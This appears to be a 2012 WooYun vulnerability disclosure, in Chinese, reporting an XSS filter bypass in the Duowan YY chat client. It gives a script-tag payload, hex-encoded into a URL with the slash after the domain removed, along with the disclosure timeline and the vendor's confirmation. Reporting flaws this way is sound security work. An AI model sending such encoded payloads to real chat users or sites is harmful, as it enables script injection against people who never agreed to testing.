当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09291

漏洞标题:多玩YYURL拦截,可致XSS攻击

相关厂商:广州多玩

漏洞作者: 撸管骚年

提交时间:2012-07-06 18:45

修复时间:2012-08-20 18:46

公开时间:2012-08-20 18:46

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-06: 细节已通知厂商并且等待厂商处理中
2012-07-06: 厂商已经确认,细节仅向厂商公开
2012-07-09: 细节向第三方安全合作伙伴开放
2012-08-30: 细节向核心白帽子及相关领域专家公开
2012-09-09: 细节向普通白帽子公开
2012-09-19: 细节向实习白帽子公开
2012-08-20: 细节向公众公开

简要描述:

多玩YY频道聊天窗口URL拦截,可导致xss攻击

详细说明:

闲来无事看乌云漏洞报告,看见一位仁兄报告的YY URL拦截可致XSS

 WooYun: 看我绕过多玩YYURL拦截 


于是下载最新版的YY试了下,发现虽然有修复过,但是还是可以利用!


2次生成的代码不一样,用之前那个同学的代码明显不好使了!
于是构造新代码

</a><a><script>alert('xss')</script></a>


然后16进制加密得到

http://www.maopian.com/%3c/%61%3e%3c%61%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c/%73%63%72%69%70%74%3e%3c/%61%3e


发出去,结果行不通


删除域名后面的/,再试试,看效果吧

http://www.maopian.com%3c/%61%3e%3c%61%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c/%73%63%72%69%70%74%3e%3c/%61%3e



漏洞证明:

修复方案:

亲,要屏蔽啊!

版权声明:转载请注明来源 撸管骚年@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2012-07-06 18:58

厂商回复:

正在处理中,谢谢。

最新状态:

暂无